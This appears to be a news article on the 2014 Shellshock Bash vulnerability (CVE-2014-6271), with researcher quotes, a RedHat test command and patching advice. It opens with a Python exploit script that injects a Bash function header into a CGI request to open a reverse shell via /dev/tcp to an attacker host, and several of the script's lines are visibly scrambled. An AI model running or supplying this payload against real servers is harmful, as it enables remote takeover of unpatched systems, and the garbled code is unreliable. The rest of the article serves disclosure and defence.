#Bash Bug
#CVE-2014-6271 bincgi- reverse shell
#

import ,,httpliburllibsys

if (len(sys.argv)<4):
	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

conn = httplib.(sys.[HTTPConnectionargv1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

Similar attacks are possible via OpenSSH, “We have also verified that this vulnerability is exposed in ssh—but only to authenticated sessions. Web applications like cgi-scripts may be vulnerable based on a number of factors; including calling other applications through a shell, or evaluating sections of code through a shell.” Stephane warned. But if an attacker does not have an SSH account this exploit would not work.

The overall impact of the Bash Bug vulnerability is widely extended, bash is commonly used to execute commands from other programs. Security experts compare the risk of exposure of Bash Bug to the Heartbleed bug.

“The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we’ll never be able to catalogue all the software out there that is vulnerable to the bash bug. ” states Robert Graham on his Blog Errata Security.

To evaluate if a Linux or Unix system is vulnerable, users could run the diagnostic test proposed by RedHat

 $ env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”

If the output of the above command looks as follows:

vulnerable this is a test

you are using a vulnerable version of Bash. The patch used to fix this issue ensures that no code is allowed after the end of a Bash function. Thus, if you run the above example with the patched version of Bash, you should get an output similar to:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test 

If your system is vulnerable, to fix the issue update to the most recent version of the Bash package by running the following command:

# yum update bash

To mitigate the Bash Bug it is recommended to disable any CGI scripts that call on the shell and as soon as possible upgrade your bash software package, principal Linux distribution vendors have released the new bash software versions:

• Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
• CentOS (versions 5 through 7)
• Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
• Debian

The Bug Bash flaw is particularly dangerous for Internet-of-things devices like smart meters, routers, web cameras and any other device that runs software which allows bash scripts. Typically, such software are not easily patchable and are more likely to expose the critical flaw in the Internet.

As said by Graham “Unlike Heartbleed, which only affected a specific version of OpenSSL, this bash bug has been around for a long, long time. That means there are lots of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won’t be, is much larger than Heartbleed.”

Pierluigi Paganini

(Security Affairs – Bash Bug, Linux)

UPDATE CERT-UK just released a Security Advisory

https://www.cert.gov.uk/resources/advisories/bash-vulnerability-aka-shellshock/